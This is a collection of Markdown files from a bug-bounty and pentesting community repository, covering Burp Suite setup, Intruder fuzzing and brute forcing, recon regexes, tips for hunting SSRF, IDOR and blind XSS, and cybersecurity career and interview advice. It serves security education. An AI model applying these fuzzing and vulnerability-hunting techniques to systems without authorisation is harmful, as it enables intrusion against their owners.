"path": "Bugbounty/bugbounty-FAQ.md", "content": "# BUG BOUNTY FAQ - freqently asked questions (Beginners friendly - Under Development)\nNote: Contents inside the **RESETHACKER Community** are to help our community members and content belongs to respective Authors and RESETHACKER Team.\n\nBugBounty FAQ | Title\n-- | --\n**0** Getting Started in Cybersecurity Advice | [Be-a-hacker and breaking cybersecurity successfully](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Getting_Started_with_Cybersecurity.md)\n**0** Domain Information - ResetHacker | [Acquisition, Get IP, Check ASN, check CIDR range, WHOIS, Reverse Whois, DNS Information etc.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/BB-FAQ/Domain-Information.md)\n**0** Bugbounty FAQ - Imran parray | [General questions asked by poeple](https://github.com/imran-parray/General-Notes)\n**0** Bugbounty Setup HelpDesk | [Got stuck During Setup We have solution for you](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup)\n**0** Job/Internship/Resume HelpDesk | [find Cybersecurity Jobs/interview, advice to get jobs, crack interview etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)\n**0** Stay upto date with conferances | [Track all the upcoming conferances](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)\n**0** Trace latest reward, CVE, writeups, tools, Reports, Disclosures and on going trend in Community | [Weekly Newsletter to keep up with infosec community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty)\n**0** Build with community | [Create, Build and Automate for personal use ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/Create.md)\n" }, { "path": "Bugbounty/burpsuite.md", "content": "\n\n# Burp Suite for Pentester\n\nIndex | title\n-- | --\n**0**. [Burpsuite - Getting Started, configure, recon setup and understnding popular features](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Burpsuite/Readme.md)\n**1**. [ProTips for Burpsuite - More updates comming Soon](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Burpsuite/protips.md)\n**2**. [Writing your Own Burpsuite Extensions - Updating Soon](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Burpsuite/Readme.md)\n------------------------------------------------------------------------------------------------------------\n\n# Burp Suite cheatsheet to hunt the vulnerabilities\nCredit : [Ignitetechnologies](https://github.com/Ignitetechnologies/BurpSuite-For-Pentester) \n\nThis cheatsheet is built for the Bug Bounty Hunters and Penetration Testers in order to help them to hunt the vulnerabilities from P4 to P1 solely and completely with \"BurpSuite\". It is designed such that the beginners can understand the fundamentals and the professionals can brush up their skills with the advanced options. There are multiple ways to perform all the mentioned tasks, thereby we've performed and compiled this list over with our experience. Please share it with your connections and send your queries and feedbacks directly to [Hacking Articles](https://twitter.com/hackinarticles).\n\n1. [Burp Suite for Pentester: Web Scanner & Crawler](https://www.hackingarticles.in/burp-suite-for-pentester-web-scanner-crawler/)\n2. [Burp Suite for Pentester – Fuzzing with Intruder (Part3)](https://www.hackingarticles.in/burp-suite-for-pentester-fuzzing-with-intruder-part-3/)\n3. [Burp Suite for Pentester – Fuzzing with Intruder (Part2)](https://www.hackingarticles.in/burpsuite-for-pentester-fuzzing-with-intruder-part-2/)\n4. [Burp Suite for Pentester – Fuzzing with Intruder (Part1)](https://www.hackingarticles.in/burp-suite-for-pentester-fuzzing-with-intruder-part-1//)\n5. [Burp Suite for Pentester – XSS Validator](https://www.hackingarticles.in/burp-suite-for-pentester-xss-validator/)\n6. [Burp Suite for Pentester – Configuring Proxy](https://www.hackingarticles.in/burp-suite-for-pentester-configuring-proxy/)\n7. [Burp Suite for Pentester: Burp Collaborator](https://www.hackingarticles.in/burp-suite-for-pentester-burp-collaborator/)\n8. [Burp Suite For Pentester: HackBar](https://www.hackingarticles.in/burp-suite-for-pentester-hackbar/)\n9. [Burp Suite for Pentester: Burp Sequencer](https://www.hackingarticles.in/burp-suite-for-pentester-burp-sequencer/)\n10. [Burp Suite for Pentester: Turbo Intruder](https://www.hackingarticles.in/burp-suite-for-pentester-turbo-intruder/)\n11. [Engagement Tools Tutorial in Burp suite](https://www.hackingarticles.in/engagement-tools-tutorial-burp-suite/)\n12. [Payload Processing Rule in Burp suite (Part2)](https://www.hackingarticles.in/payload-processing-rule-burp-suite-part-2/)\n13. [Payload Processing Rule in Burp suite (Part1)](https://www.hackingarticles.in/payload-processing-rule-burp-suite-part-1/)\n14. [Beginners Guide to Burpsuite Payloads (Part2)](https://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-2/)\n15. [Beginners Guide to Burpsuite Payloads (Part1)](https://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-1/)\n16. [Burpsuite Encoder & Decoder Tutorial](https://www.hackingarticles.in/burpsuite-encoder-decoder-tutorial/)\n17. [Burp Suite for Pentester: Active Scan++](https://www.hackingarticles.in/burp-suite-for-pentester-active-scan/)\n18. [Burp Suite for Pentester: Software Vulnerability Scanner](https://www.hackingarticles.in/burp-suite-for-pentester-software-vulnerability-scanner/)\n19. [Burp Suite for Pentester: Burp’s Project Management](https://www.hackingarticles.in/burp-suite-for-pentester-burps-project-management/)\n20. [Burp Suite for Pentester: Repeater](https://www.hackingarticles.in/burp-suite-for-pentester-repeater/)\n" }, { "path": "Burpsuite/Assets/Readme.md", "content": "\n" }, { "path": "Burpsuite/Readme.md", "content": "Credit: Vikram -team ResetHacker\n\n**Q: What is Burp and why is it important for penetration testing?**\n\n Web application penetration testing tool developed in JAVA also know as \"Interception Proxy\" tool because allows you to inspect, modify, replay, etc to web requests. \n It has a vast amount of plugins to aid in the identification and exploitation of bugs but its real power comes from allowing attackers the ability to inspect and manipulate raw HTTP requests.\n\n**Enterprise - Professional - Community**\n\n\tBurp Suite - basic features such as proxy, repeater, intruder, decoder, comparer etc.\n\tBurpSuite - Advance features such as Extender, scanner, sequencer, collaborator, infiltrator etc\n\n### Download and run\n* Download [Burp Suite](https://portswigger.net/burp/communitydownload)\n* Run in terminal\n```\nTo run Burp, you will need Java version 11 to 17. \njava -version\njava -jar -Xmx4g /path/to/burp.jar\n```\n\n![burpsuite hotkeys](https://user-images.githubusercontent.com/25515871/177658512-18b7310b-98a2-4462-b353-30a4c0b13c42.jpg)\n\n\n**Burp-Proxy-Setup**\n\tThe proxy tab is probably the most important tab in Burp. This is where you can see all of your traffic that passes by the Burp proxy.\n\t\n\t\t○ To check Proxy is listening in burp :\n\t\tOpen BurpSuite > Proxy > options > Running (Ticked)\n\t\t○ Force your browser to route its traffic through the Burp proxy:\n\t\tBrowsers setting > Network setting - connection setting - Manual Proxy Configuration\n\t\t(IP: 127.0.0.1 and Port : 8080)\n\t\t○ Imported the Burp certificate in your browser:\n\t\tType https://burp in browser and download the certificate.\n\t\tSettings > Import the CA certificate > tick all the option & save it.\n\t\n**Note that,** \n \n ○ Normally people turn “intercept” to off ( to avoid manually forward for each request ) and rather view the traffic in the “HTTP History” tab. only turn “intercept” to on when trying to isolate requests from a specific feature.\n ○ HTTP History is where people spend 80% of my time looking for something that peaks my interest. When looking at the traffic I'm mostly paying attention to the method,url, and MIME type fields. Why? \n\t○ Because when I see a POST method being used I think of Stored XSS, Cross site request forgery, and many more vulnerabilities. When I see a URL with an email, username,or id in it I think IDOR. When I see a JSON MIME type I think back-end API. Most of this knowledge of knowing what to look for comes with experience.\n\t○ One functionality that people use to find a lot of vulnerabilities and make my life easier is the search feature. Basically you can search for a word(s) across all of your Burp traffic.\n\t\tFor example I may search for the word “url=” this should show me all requests which have the parameter URL in it, I can then test for Server Side Request Forgery (SSRF) or open redirect vulnerabilities. I might also search for the header “Access-Control-Allow-Origin” or the“callback=” GET parameter when testing for Same Origin Policy (SOP) bypasses. \n\n**[Jason Heddix- To LINK target discovery w/ Burp Suite:](https://twitter.com/jhaddix/status/972926512595746816?lang=en)\n\t\n\t1) Turn off passive scanning\n\t2) Set forms auto to submit\n\t3) Set scope to advanced control and use string of target name (not a normal FQDN)\n\t4) Walk+browse, then spider all hosts recursively!\n\t5) Profit (more targets)!\n\n**Export subdmains from file to Burp suite**\nExport subdmains from file to Burp suite by [@tvmpt](https://twitter.com/tvmpt)\n\n```cat | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s```\n\n# Recon with BurpSuite\n**Credit : https://github.com/ghsec/webHunt/**\n\n### Set scope\n* Scope --> Use advansed scope control --> Add --> host or IP range == target\n\n![Scope](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2002-25-10.png)\n\n### Spidering \n* Select all host in sitemap and Spider. \n* Do it again and again if new hosts are noticed.\n\n### Recon for new Subdomains\n* Collect new subdimains which is not detected by spider. in request | response body.\n```\n(http[s]?:\\/\\/)?((-)?[\\w+\\.]){1,20}domain\\.com\n```\nNote: click + button and check regex && Auto-scroll to match when text changes\n\n![ReconSubdomain](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2002-40-35.png)\n\n### Extract endpoints from js file\nnote: regex taken from Linkfinder by GerbenJavado\n```\n(?:\"|')(((?:[a-zA-Z]{1,10}://|//)[^\"'/]{1,}\\.[a-zA-Z]{2,}[^\"']{0,})|((?:/|\\.\\./|\\./)[^\"'><,;| *()(%%$^/\\\\\\[\\]][^\"'><,;|()]{1,})|([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|/][^\"|']{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\\?[^\"|^']{0,}|)))(?:\"|')\n```\n![Endpoints](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2009-56-26.png)\n\n### Internal | External IP address\n```\n\\b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\\b\n```\n![IP](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2010-08-11.png)\n\n\n-------------------------------------------------------------------------------------------------------------------------------\nCredit: Vikram -team ResetHacker\n\n**2.Target -> SITEMAP** \n\n ○ Sitemap becomes fairly useful when hitting an undocumented API endpoint as this view allows you to build a picture of the possible endpoints. You can also view the HTTP requests in this tab, clicking on a folder in the sitemap will only show requests from that path. \n\n\t\n**3.Intruder:**\n\t\t\n ○ If you're doing any fuzzing or brute forcing with Burp you're probably doing it in the “intruder” tab. When you find an interesting request right click it then click “Send to Intruder”\n\t\t\n\t\t Goto \"Intruder\" > Click \"Clear\"> Now from here your steps vary depending on what you're trying to do,\n\t\t Eg: we are trying to do some parameter fuzzing. One of the first things we need to do is select the value we are trying to modify. This can be done by highlighting the value and pressing the “Add” button. Since we are attempting to do parameter fuzzing this is the value that will be replaced with our fuzzing payloads. \n\t\t\n\t\tYou may have also noticed the “Attack type” drop down menu is set to “Sniper”, there are four different attack types which are described in the table below: \n\t\t\ti. Sniper Uses a single payload list; Replaces one position at a time; \n\t\t\tii. Battering ram Uses a single payload list; Replaces all positions at the same time; Once you have selected your attack type and the value to be modified click on the “Payloads” sub tab as shown below: \n\t\t\tiii. Pitchfork Each position has a corresponding payload list; So if there are two positions to be modified they each get their own payload list. \n\t\t\tiv. Cluster Bomb Uses each payload list and tires different combinations for each position.\n\t\tOnce you have selected your attack type and the value to be modified click on the “Payloads” sub tab.Here we want to select our payload type and the payload list. \n\t\tAs for my payload list we want a list of fuzzing values. For this example im just going to use the default lists that comes with Burp but there are some other good lists on SecLists: \n\t\t● https://github.com/danielmiessler/SecLists/tree/master/Fuzzing\n\t\tNow to use Burps pre defined list just click the “Add from list” drop down menu and select one.\n\t\tNow that you have your fuzzing list imported all that you have to do is press “Start attack”.\n\t\tThe next step is to inspect the HTTP responses to determine if there is anything suspicious. However, most professionals don't use intruder, they use a plugin called “Turbo Intruder”\n\t\n**4.Repeater:**\n \n ○ Repeater modify and replay and request you do it in the repeater tab. the request to test for vulnerabilities and security misconfigurations.\n\t You might have noticed that at the top there are a bunch of different tabs with numbers on them. By default every request you send to the repeater will be assigned a number. Whenever I find something interesting I change this value so I can easily find it later, that's why one of the tabs is labeled SSRF,it’s a quick easy way to keep a record of things. \n\t\n\n**5.Burp Collaborator:**\n\n ○ A network service which helps to discover blind vulnerabilities such as SQL injection, XML injection, cross-site scripting, code enjection etc\n \n \n![burpcollabrator](https://user-images.githubusercontent.com/25515871/176586154-99f71311-4a8d-4dcb-90ff-8fd8dff48a46.png)\n\n \n\n \n**6.Burp Recommended Extensions:**\nBurp Extender lets you enhance Burp's functionality by installing extensions created by the community, or even writing your own. \nBurpSuite > Extender > BApp Store \n\nBurp extensions can customize and extend Burp Suite's behavior in numerous ways. Few recommended tools are\n\t\n![burpsuite recommanded tools](https://user-images.githubusercontent.com/25515871/176586231-3671f592-f870-4583-a05d-d33d3f4a87d3.png)\n\n" }, { "path": "Burpsuite/protips.md", "content": "# Pro Tips for Bupsuite\n\n[Author b1twis3](http://b1twis3.ca/burpsuite-30-pro-tips/) | #BurpSuiteTips\n\n## Sample : \n**[1/30](https://twitter.com/fasthm00/status/1228118057144537088)** | \n \n Instead of using many tools to do multiple level of encoding or string manipulation. \n You can do all of that and MORE using #Hackvertor extension by @garethheyes in just a couple of clicks!] \n\n**[2/30](https://twitter.com/fasthm00/status/1228544097679527937)** | \n \n #SleepyPuppy is one of the blind XSS management frameworks by @netflix that integrates with BurpSuite.\n - Manage Assessments and Payloads (Burp or SP)\n - Integration with Repeater and Intruder\n - Logs and Statistics \n - Active Scan\n - Multiple Users\n\n**[3/30](pic.twitter.com/G1FYXLV8WC)** | \n\n Applying session handling & macro to a 3rd party tool (Sqlmap) and excluding a cookie value from the altering. \n Note that I just used the profile endpoint and the /login RESTful api for testing purposes. \n\n**[4/30](https://t.co/oAtqGgubEu)(pic.twitter.com/xapBjWNwAa)** | \n \n Deploying Private BurpSuite Collaborator in AWS EC2 Instance (Automated). \n You could use the AWS console to do it manually as well! Note that this is the basic implementation of the server.\n\n**[5/30](pic.twitter.com/s7LwoPGGk2)** | \n \n Creating sequences of requests/steps using BurpSuite extension #Stepper.\n Another #Tip: \n No need to be an expert in #RegEx to use Stepper, just use BurpSuite Sequencer (Select! Then copy the RegEx) \n BUT it's good to know RegEx ofc! \n\n**[6/30](pic.twitter.com/3t6ECg0W6U)** | \n \n A short but valuable tip when it comes to automation!\n Generating scripts such as Python, cURL, PowerShell and other scripting languages to reissue a selected HTTP request. \n\n**[7/30](https://t.co/qYA50Ffw1H)** |\n \n Now you can match responses based on specific conditions and push the matched strings/body to your slack/custom server.\n – Customize the push notification\n – Timer\n – Match all the callbacks.\n\n" }, { "path": "CONTRIBUTING.md", "content": "# Contribution Guidelines\n\nPlease note that this project is released with a [Contributor Code of Conduct](code-of-conduct.md). By participating in this project you agree to abide by its terms.\n\n## Submitting a pull request\n\nIf you like to contribute to an Resethacker community repository, this is how you do it.\n\n
\n\n- Fork this repository\n- Clone this repository\n- Add or Make the changes\n- Wait for your pull request to be reviewed and merged! \n\n\n## Updating your Pull Request\n\nSometimes, a maintainer of an ResetHacker community will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the ResetHacker guidelines.\n" }, { "path": "Contributors.md", "content": "# Contributors\n\nWe are very grateful to the following people have contributed to this project.\n\n" }, { "path": "CyberSecurityJobs/Careers", "content": "1. | [cyber-security-careers/](https://www.sans.org/cybersecurity-careers/20-coolest-cyber-security-careers/)\n\n# Security Operation Operation(SOC L1 & L2 Team)\n\nSUMMERY: \nWhat happens if antivirus get triggered, firewall configuration got triggered, Some malware are sending the date to an outside server(Dashboard),\n\n 1. Monitor and analyse for malicious activity (By opening Event Viewers in a windows machine.\n Security analysis receiving data log from each machine or search species log/failure analysis it and creates a report that's why we call ourself Security Analysis or L 1 team)\n\n 2: Project review\n 3: USE TOOLS Spunk (S.I.E.M) \n 4: Incient Response \n 5: general cve & latest Vulnerability update \n \n ##Roles and responsibilities of an entry-level SOC Analyst\n\t • Perform threat analysis\n\t • Monitor network for malicious activity\n\t • Perform risk analysis, security assessments, and vulnerability testing\n\t • Maintain log analysis\n\t • Application/ mobile security\n\t • Vulnerability scanning in software and hardware\n\t • Coordinate with other analysts and departments for network security\n\t • Investigate, document, and report all security issues\n\t • Implement and maintain security protocols\n\t • Involved in security audits – internal and external\n\t • Anticipate threats and alerts to avoid their occurrence\n\t • Coordinate with vendors on security plans\n\t • Analyse breaches to determine their root cause\n\n From \nPre-requisite to get into SOC Level 1 –\nFrom \n\n\n ##COURSE: Security Operations Center | Certified SOC Analyst | CSA | EC-Council (eccouncil.org) \n\n 1. Security Operations and Management\n 2. Understanding Cyber Threats, IoCs, and Attack Methodology \n 3. Incidents, Events, and Logging\n 4. Incident Detection with Security Information and Event Management (SIEM}\n 5. Enhanced Incident Detection with Threat Intelligence\n 6. Incident Response\n \n\n\nInterviews Questions:\n What is SOC and security analyst.\n DATA leak & high level steps in DATA loss preventions\n Phishing,Vishing & prevention \n Explain DNS works \n Some example of Web server vulnerabilty & how to prevent them.\n Protect themselves from SQL Injection \n Port number populer one & why remove certain ports {80,22, 443 58 etc and understanding of each ports}\n Hashing & Encryption \n Some Security vulnerabilty in 2021 & 2020\n Explain HTTPS & SSL \n" }, { "path": "CyberSecurityJobs/CoverLetter.md", "content": "# Cover letter tips for Cybersecurity Jobs :\n \n 1. Highlight your experience\n 2. Show your passion for the job and talk about projects (if any).\n 3. Lean and modify Your resume based on job description.\n 4. Recheck and know your cover letter and resume.\n\n\n*___________________(eg Penetration Tester,security analist etc) Cover Letter Example 1*\n\n I am excited to be applying for the ___________________ position at Topdown Security. I have more than five years of experience in the information security field and have been working as a ___________________ for the past two years. I am confident that I have the skills and experience that you are looking for in this role.\n\n I am motivated by the challenge of finding and exploiting vulnerabilities in systems and enjoy the satisfaction of helping an organization improve their security posture. I have a strong technical background and am proficient in a variety of security assessment tools and techniques. I am also experienced in working with clients and have a proven track record of delivering quality results on time and within budget.\n\n I am committed to continuing to grow as a ___________________ and am excited about the opportunity to join Topdown Security and learn from the best in the industry. I believe that my skills and experience would be a valuable addition to your team, and I look forward to discussing this opportunity further with you.\n\n\n*___________________(eg Penetration Tester,security analist etc) Cover Letter Example 2*\n\n I am writing in regards to the ___________________ opening that I saw on your website. I am confident that I have the skills and qualifications that you are looking for.\n\n For the past three years, I have been working as a ___________________. In that time, I have performed hundreds of tests, successfully identifying vulnerabilities in systems. I have also been responsible for developing and implementing security measures to protect systems from future attacks.\n\n My skills go beyond just identifying vulnerabilities. I am also an expert in penetration testing tools and techniques. I am able to quickly and efficiently find and exploit security holes in systems.\n\n I am confident that I can be a valuable asset to your company. I am a hard worker who is always willing to go the extra mile. I am also a team player who is able to work well with others.\n\n Please contact me to discuss any questions you may have. I look forward to hearing from you.\n\n Sincerely,\n\n Your name\n\n*___________________(eg Penetration Tester,security analist, Network Administrator etc) Cover Letter Example 3*\n\n I am writing to express my interest in the ___________________ position that you have posted. I believe that I would be a great fit for this position as I have extensive experience in the field of ___________________ and security assessment.\n\n I have been working in the IT industry for over 10 years, with most of my experience being in the field of information security. I have worked on many projects ranging from small business security assessments to enterprise-level network security assessments. I have also worked on several ___________________ engagements, including vulnerability assessments, source code reviews, and wireless assessments.\n\n My background includes working as a ___________________(eg Penetration Tester, Security Analyst, and Network Administrator). My core competencies include performing vulnerability assessments, penetration testing, and security assessments. I am also skilled in the use of various security tools such as Nessus, Metasploit, Wireshark, and Netcat.\n\n I am confident that my skills and experience will make me an asset to your organization. I look forward to hearing from you soon.\n\n\n\nSource : https://climbtheladder.com/penetration-tester-cover-letter/\n" }, { "path": "CyberSecurityJobs/CybersecuityDiscipline.md", "content": "\nAfter Reading this I hope this will help you in understanding which disciplines best fit your abilities, experience, and interests in cybersecurity career.\n\nReference from Cybersecurity Career Guide - By Alyssa Miller \n\n![Cybersecurity Desipline and jobs](https://user-images.githubusercontent.com/25515871/180645636-0114e9ef-b3af-4fc6-88ff-ed4ccdcba52a.png)\nNote : Each of these disciplines,depicted in figure 2.1, categorizes numerous job roles that are constantly evolving and changing. \n\n Security operations (SOC TEAM)\n Digital forensics and incident response (DFIR)\n Security architecture and design\n Security assessment and verification (Vulnerability assisments, pentesting red teaming etc)\n Application, software, and product security\n Governance and compliance\n Education and awareness\n Sales and sales support\n Leaders and executives\n \n\n**Security operations**(people on the cybersecurity front lines):\n\n The skill sets of these people tend to be wide ranging as they’re ultimately responsible for maintaining security\n posture across all technologies within an organization. The responsibilities within security operations therefore are\n wide reaching. At the core of security operations is typically the security operations center (SOC). \n The function of the security operations center (SOC) is to monitor, prevent, detect, investigate, and respond to \n cyber threats around the clock. SOC teams are also charged with monitoring and protecting the organization's assets including\n intellectual property, personnel data, business systems,and brand integrity.\n\n The security operations role also interfaces with many of the other roles that we will discuss. For instance, \n when an alerted event turns out to be an attack, they may need to engage the incident response team to provide \n a more sophisticated response to the problem (more on that soon). They also need to be aware of the current threat landscape,\n because receiving regular information from threat intelligence resources is crucial.\n\nAdvice:\n \n For many who are looking to begin a career in cybersecurity,Security operations is where they start. Security operations\n roles often work with automated systems and repeatable tasks that lend themselves well to on-the-job learning and training. \n Additionally, individuals in these roles can easily leverage previous IT experience in their daily job functions.\n\n Finally, because of the nature of the role and the wide-ranging responsibilities over various forms of technology,\n security operations is a terrific way to gain exposure to a lot of the technologies and concepts that the cybersecuirty \n teams are charged with defending.\n \n \n**Digital forensics and incident response (DIFR)** that focuses on the identification, investigation, and remediation of cyberattacks.\nDFIR has two main components:\n\n Digital Forensics: A subset of forensic science that examines system data, user activity, and other pieces of digital evidence\n to determine if an attack is in progress and who may be behind the activity.\n Incident Response: The overarching process that an organization will follow in order to prepare for, detect, contain, and recover from a data breach.\n \nWhereas the SOC is responsible for evaluating potential incoming attacks and taking initial steps to defend against\nthem, they will typically escalate to incident response(IR) personnel if a more coordinated and specialized level of\nresponse is needed or if the breadth of the attack involves extensive portions of the environment.\n\n" }, { "path": "CyberSecurityJobs/For_Jobs.md", "content": "**For Job** :\n\n- 1. Understand domain & choose your Goal.\n- 2. Find your Mentor.\n- 3. Validate your Career and Goal with Mentor.\n- 4. Complete the course(Free/paid) to intensify learning\n- 5. Build a Project, Resume & Cover letter.\n- 6. Attend 2 Mock - 1 with Community & 1 interview with your Mentor.\n- 7. Apply & Get a Job. \n\nSimplified steps to get a Job.\nIf anyone like to comment their point of view or like to add something most welcome :) \n\nNote : When i say project it does mean building something in cybersecurity that actual solve the problem such as Attack surface management project or bug bounty tool or automate your workflow etc and not keylogger.\n\nBy offensive Security :\n\n- 🔴Build a Strong Resume \n\n ➡Resume Now: https://resume-now.com/build-resume\n ➡Novoresume: https://novoresume.com\n ➡Information Technology resume examples: https://www.jobhero.com/resume/examples/information-technology\n\n- 🔵Interview Prep \n \n ➡Tell Me About Yourself: https://youtube.com/watch?v=TQHW7gGjrCQ\n ➡35 Pentesting Interview Questions (With Sample Answers): https://indeed.com/career-advice/interviewing/pentesting-interview-questions\n ➡200 IT Security Job Interview Questions via McAfee: https://www.mcafee.com/enterprise/en-us/assets/misc/ms-200-it-security-interview-questions.pdf\n\n- 🟣 YouTube Channels\n \n ➡OffSec Live | How to Write a Cybersecurity Resume: https://youtube.com/watch?v=zZSiml6vGO0\n ➡Resume reviews with Neal Bridges:https://youtube.com/watch?v=wejL0ll__uQ&list=PLqEPHR4iX_BJRT6qDSSNy2sWgbaPlxx1p\n ➡Infosec Job Hunting with Jason Blanchard: https://youtube.com/playlist?app=d\n\n\n---\n\n2. Find a Mentor :\n - Stage 1 : Invite Based & selected Mentors only.\n - Stage 2 : Search You're mentor on platform.\n\n- 3. Validated your Career and Goal with Mentor.\n**Mentor Questions** :\n\n If Cadidate is Ready:\n - May i know what role do you apply for ?\n - How do you prepare for the interview ?\n - Wait i'll share you something that will help you.\n - And when you're ready with interview questions then let know I'll arrange a Mock interview Test before the actual Interview so you can be prepare and be confident for an interview.\n\n If Cadidate is not ready:\n - Can you introduce yourself and tell me about achivements ?\n - May i know the Couse that you have completed or get certified ?\n\n- 4. Complete the course(Free/paid) to intensify learning.\n- 5. Build a Project, Resume & Cover letter.\nHappy to help and take care of yourself.\n\n---\n\n- 6. Attend 1 Mock interview with your Mentor.\n - Review the Assigned task from last talk \"Validate from Mentor\".\n - Rate the candidate, give a remark & Move forward with Mock Interview:\n - Complete the Mock Interview, give a Remark & Suggestion where to apply etc.\n\n---\nCongratulation you're ready for a Job.:)\n\n\n\n=========\n# Breaking into cybersecurity:\n\n- These videos / guides will help you to smash your next interview!\n\nTop 30 Penetration Tester Interview Questions / Answers\nhttps://lnkd.in/eAkvQFZG\n\nCyber Security Interview Prep\nhttps://lnkd.in/eky9v_hC\n\nSOC Analyst Interview Questions (LetsDefend)\nhttps://lnkd.in/eqFPGS-Z\n\nGRC Entry-Level Interview Q&A (👉🏼 Gerald Auger, Ph.D.)\nhttps://lnkd.in/eK6uti-W\n\nMastering the Art of the Interview (TEDX Talks / Ashley Rizzotto, M.Ed.)\nhttps://lnkd.in/ecMGM5Tn\n\nTell Me About Yourself - A Good Answer To This Question\nhttps://lnkd.in/eES-wF7Q\n\nHow to Ace a Job Interview: 10 Crucial Tips\nhttps://lnkd.in/e29vxaH9\n\nCybersecurity Interview Preparation Playlist (👉 Jon Good 👈)\nhttps://lnkd.in/ek-x4cPx\n\nHow To Be Confident In Interviews\nhttps://lnkd.in/eGQgXbKJ\n\nHow To Crush Any Interview\nhttps://lnkd.in/eWr2mU57\n\n10 Best Questions to Ask an Interviewer\nhttps://lnkd.in/efMbFn4S\n\nHow to Ace Your Job Interview (David Bombal)\nhttps://lnkd.in/eKyqWpCU\n\nCybersecurity Practice Interview Questions Playlist (Josh Madakor)\nhttps://lnkd.in/eqw-Z-tD\n\nHow to Prepare for a Cyber Security Interview (Cyberspatial)\nhttps://lnkd.in/eTzegN6G\n\nHow to Fail a Cybersecurity Interview (Cyberspatial)\nhttps://lnkd.in/eu_KyAf2\n\n" }, { "path": "CyberSecurityJobs/Intership_Advice.md", "content": "## 1. Internship \n[Advise by iamthefrogy](https://github.com/iamthefrogy)\n \n Shall I go for an internship in any company after my study?\n \n Will it be helpful in my career?\n \n What kind of internship do companies provide?\n \n Is it necessary to do it from a renowned company or any company?\n\n\nThe answer to this question is too broad. It depends on many factors such as:\n \n • Which company is providing Internship (Product based company, security consulting company, Big4 etc.?)\n\n • What are their requirements for internship programs?\n\n • What will be the job roles and responsibilities during the internship?\n\n • What are the expectations from an employer?\n\nThere are very few; I would say only a handful of companies that provide quality internships where you would learn valuable things. \nMost of the money-making companies are running CEH (Certified ethical hacker – Which is the official certification from EC-Council, a well-reputed cybersecurity certification authority) and related courses on the name of an internship. \nFor example, if my company's name is Prakash, then I will provide my own CEH certification in the name of \"PCEH – Prakash Certified Ethical Hacker\" and so on.\n\n- So, I have prepared 'DO' and 'DON'T' for selecting a company for your internship\n\n\n## DO\n\n • Understand the nature of a company (consulting, product-based, small, big, etc.).\n\n • Ask them about your daily responsibilities, tasks, and job routines.\n\n • Ask them what the learning options are they can provide to you during your internship.\n\n • Ask them what their expectations from you during the duration of the internship will be.\n\n • Ask more and more people around for the reviews of those companies you are evaluating for internships.\n\n • Identify your career interests. This could be done by self-reflection, speaking with a Career Counsellor or your mentor\n\n • Ask the company about paid or unpaid Internships. You can go for any as far as other criteria are matched.\n\n • Start searching for an internship at least 6 months prior.\n\n • If you are interested in any company and can't find any internship opportunity, you can check their website and social media. Connect to their HRs via\n\n • LinkedIn and ask the same.\n\n • Better understand and research who they are, what they do, their strengths and weaknesses\n\n • Perform at least 5 mock interviews with your career counsellor or mentor before going for an internship interview.\n\n\n## DON'T\n\n • Don't select a company that just provides course teaching, coaching.\n\n • Don't select a company that do not serve any clients or serve any handful of clients only with simple projects.\n\n • Don't select a company that asks you to teach their students via their coaching, training programs.\n\n • Don't get attracted by any company's marketing & PR success.\n\n • Don't get attracted by their company's reputation through magazines, press, awards from random conferences or panels.\n\n • Don't select a company where only 4/5 people are working; all are Founders, Co-Founders, Directors. If you do, please check their professional\n\n • background. Check whether they obtained these titles without having any prior corporate experience or started their start-ups after having at least 8\n years of experience in the industry\n" }, { "path": "CyberSecurityJobs/InterviewQA.md", "content": "0. All for one - interview questions - https://drive.google.com/drive/folders/17Brt0bx__E5Dd7PeR_09wPylidpDFZ7M?usp=sharing\n\n1. [83 Basics Hacking Question Answers](https://www.besanttechnologies.com/ethical-hacking-interview-questions-and-answers#) \n\n2. [SOC Analyst (Cybersecurity) Interview Questions and Answers - Udemy Anand Guru]()\n\n3. [60 Cybersecurity Interview Questions](https://danielmiessler.com/study/infosec_interview_questions/)\n\n4. [Security Engineer Interview Questions](https://github.com/tadwhitaker/Security_Engineer_Interview_Questions/blob/master/security-interview-questions.md)\n5. [Security Engineer Interview Questions](https://gist.github.com/boodera/f216ac8c0ca6eb291e09b2e3cf19b3fd)\n6. [Security Engineer Interview Questions, Quiz etc](https://github.com/justinltodd/security-interview-questions)\n7. [Security Engineer Interview Tips](https://github.com/jigerjain/Interview_Tips)\n8. [Infosec interview Questions](https://github.com/pbnj/infosec-interview-questions)\n9. [Security Engineer Interview Questions and Engineering interview questions](https://github.com/paulveillard/cybersecurity-interview-questions#security)\n10. [Top 50 Interview Questions & Answers | Penetration Testing - Updated 2022](https://allabouttesting.org/interview-questions-answers-penetration-testing/)\n11. [Penetration Testing Interview Questions Cheat Sheet](https://allabouttesting.org/interview-questions-answers-penetration-testing/)\n12. [*Penetration Testing Interview Questions Cheat Sheet by Stefano Lanaro](https://steflan-security.com/penetration-testing-interview-questions-cheat-sheet/)\n\n13. [🧵Resources for a Successful 